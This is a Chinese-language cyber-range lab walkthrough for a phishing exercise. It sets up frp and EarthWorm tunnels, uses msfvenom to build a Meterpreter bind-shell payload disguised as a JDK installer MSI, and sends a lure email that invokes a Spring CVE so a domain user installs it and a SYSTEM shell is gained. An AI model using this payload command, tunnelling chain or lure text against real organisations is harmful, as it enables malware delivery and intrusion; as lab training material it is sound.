【实验目的】

通过Measploit生成msi命名为java的JDK，上传至DMZ区门户网站1的服务器，并诱使用域用户放下戒备，下载安装可信任文件，了解并掌握钓鱼邮件的原理。

【知识点】

钓鱼邮件

【实验原理】

钓鱼邮件指利用伪装的电邮，欺骗收件人将账号、口令等信息回复给指定的接收者；或引导收件人连接到特制的网页，这些网页通常会伪装成和真实网站一样，如银行或理财的网页，令登录者信以为真，输入信用卡或银行卡号码、账户名称及密码等而被盗取。

【软件工具】

• 服务器：Windows Server 2008 1台；防火墙 1台；Centos 7 1台；Windows 10 3台；Windows 2016 1台；

• 交换机/路由：交换机 4台；路由器 1台；

• 软件：frp；SocksCap64；Measploit；EarthWorm；谷歌浏览器；

【实验预期】

1.Measploit生成msi木马。
2.上传msi木马至可信任内网服务器。
3.利用xiaowang用户编写钓鱼邮件发送给xiaozhang用户。
4.模拟域用户xiaozhang下载安装执行木马。
5.开启Meaploit监听返回shell。

【实验步骤】

1.利用frp代理建立二级隧道

单击上方菜单栏中的【环境申请】按钮启动实验拓扑，选择拓扑图中左下方的【攻击机2-Windows】，按右键，在弹出的菜单中选择【控制台】，登录【攻击机2-Windows】界面。

双击打开攻击机2-windows桌面【工具】的【frp】文件夹，在该文件夹空白处，右键弹出菜单，选择【在此处打开命令提示符】。

在命令提示符窗口中，输入以下命令，开启本地服务端代理监听7000端口。

frps -c frps.ini

输入以下命令并按下回车，远程连接目标服务器的SSH202.1.10.57服务器，ssh用户名为【test】，密码为【Com.1234】。如下图所示。

ssh [email protected]

输入以下命令并按多次回车，执行frpc客户端与服务端连接。

frpc -c /tmp/frpc.ini &

输入以下命令并按多次回车，在网站门户2中开启frp服务端程序。

frps -c /tmp/frps.ini &

双击打开桌面上的远程桌面，下拉【计算机】，选择【202.1.10.34】，单击【连接】按钮，连接目标202.1.10.34服务器。

进入远程桌面窗口，关闭服务器管理器窗口，在桌面shift+右键弹出菜单，选择【在此处打开命令提示符】。

输入命令并按回车，在网站门户1中开启frp客户端程序。

frpc -c frpc.ini

依次双击打开桌面上的【工具】→【SocksCap64-4.7】文件夹，并双击打开【SocksCap64.exe】socks代理客户端软件。

注：打开SocksCap64.exe会有些慢。

在socks代理客户端软件窗口中，双击【远程桌面连接*32】图标。

弹出远程桌面连接窗口，在计算机下拉框选择【10.0.18.22:1111】，完成后按回车。

注：在第八单元的8.2子任务中将LCX添加注册表启动项，由本地3389端口转发本地1111端口，绕过防火墙限制。

等待目标远程连接。

弹出输入密码框，输入密码【Xw@A0107.】并按回车。

等待目标远程连接后，弹出内网10.0.18.22窗口界面，。

2.Measploit生成msi木马

回到攻击机2-Windows界面，在桌面右键弹出菜单，选择【在此处打开命令提示符】。

输入以下命令并按回车，在桌面生成Windows正向连接jdk-21_windows-x64_bin.msi文件木马。

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=9999 -f msi -o jdk-21_windows-x64_bin.msi

注：-p ：指定使用的payload为windows 64位的正向TCP连接。
LPORT ：指定目标监听端口。
-f 指定为msi，并生成名为 jdk-21_windows-x64_bin.msi

输入msfconsole命令并按下回车键，进入Metasploit控制台界面。

使用use参数选择指定模块，输入以下命令选择指定监听模块并按下回车，进入该模块如下图所示。

use exploit/multi/handler

输入以下命令并按回车，使用set命令，更改payload为windows/x64/meterpreter/bind_tcp。

set payload windows/x64/meterpreter/bind_tcp

输入以下命令并按回车，使用set命令设置目标监听IP。

set rhost 202.1.10.34

输入以下命令并按回车，使用set命令设置目标监听端口。

set lport 9999

使用options命令，查看是否已设置正确。

3.上传msi木马

回到网站门户1【202.1.10.37】远程窗口，复制桌面的【jdk-21_windows-x64_bin.msi】文件至网站门户1【202.1.10.37】的D:\phpStudy4IIS\WWW目录下。

在桌面shift+右键弹出菜单，选择【在此处打开命令提示符】。

输入以下命令并按回车，使用ew端口转发功能，转发由内网主机【10.0.18.57】本地端口9999转发至网站门户1【202.1.10.37】本地端口9999。

ew.exe -s lcx_tran -l 9999 -f 10.0.18.54 -g 9999

4.利用xiaowang用户编写钓鱼邮件发送给xiaozhang用户

回到内网主机xiaowang远程窗口，双击桌面邮件客户端程序【Thunderbird】。

打开邮件客户端程序后，单击下图【编写新消息】按钮。

打开桌面【工具】→【邮件模版.txt】。

标题编写为【Spring框架远程代码执行 CVE-2022-22965】，复制【邮件模版.txt】并粘贴至粘贴，末尾处添加URL连接编写为以下正文，其目的为让诱骗用户下载安装下文链接。

尊敬的同事们：
您好！
    根据行业多数网络安全厂商以及国家网络安全应急中心消息报道，在所发布的《Spring框架远程代码执行 CVE-2022-22965》一文中，通告非正版合法Java jdk文件可能会导致相关漏洞产生，漏洞风险评级为高危。
    目前互联网大量恶意攻击者已监测到该漏洞细节。鉴于该漏洞影响范围极大，建议公司员工通过公司专用支持渠道下载安装最新版本Jdk，最新版本下载链接为：http://172.16.10.37/jdk-21_windows-x64_bin.msi。

编写完成后，单击左上方的【发送】按钮。

发送完成后，回到邮件客户端程序主页面，单击左侧的【已发送消息】选项，检查是否正确发送。

5.模拟域用户xiaozhang下载安装执行木马

选择拓扑图中右侧方的【域成员主机2】，按右键，在弹出的菜单中选择【控制台】，输入账号密码xiaozhang/abc#321，登录【域成员主机2】界面。

双击桌面邮件客户端程序【Thunderbird】。

打开邮件客户端程序后，在【收件箱】一栏中，可收到邮件标题为【Spring框架远程代码执行 CVE-2022-22965】，并双击打开该邮件。

打开邮件后，内容提示JAVA漏洞信息，并下载安装最新版本JDK，单击该链接，进行下载。

单击链接后，自动打开谷歌浏览器，下载文件，并单击下图箭头处的【keep】按钮，保留下载的文件。

双击谷歌浏览器下方的下载列表文件【jdk-21_windows-x64_bin.msi】，进行安装。

6.开启Meaploit监听返回shell

选择拓扑图中左下方的【攻击机2-Windows】，按右键，在弹出的菜单中选择【控制台】，登录【攻击机2-Windows】界面。

回到Measploit窗口，输入run命令后，返回了一个session会话。

注：多按几次回车，直至进入meterpreter模块。

在meterpreter模块中输入shell命令，进入cmd控制台，并输入whoami按回车，返回当前用户为system。

注：AlwaysInstallElevated是一个策略设置，当在系统中使用Windows Installer安装任何程序时，该参数允许非特权用户以system权限运行MSI文件。

输入ipconfig命令，查看当前IP地址为10.0.18.54，为xiaozhang用户。

【实验结论】

通过上述操作，Measploit生成msi命名为java的JDK，上传至DMZ区门户网站1的服务器，并诱使用域用户放下戒备，下载安装可信任文件，了解并掌握钓鱼邮件的原理，符号实验预期。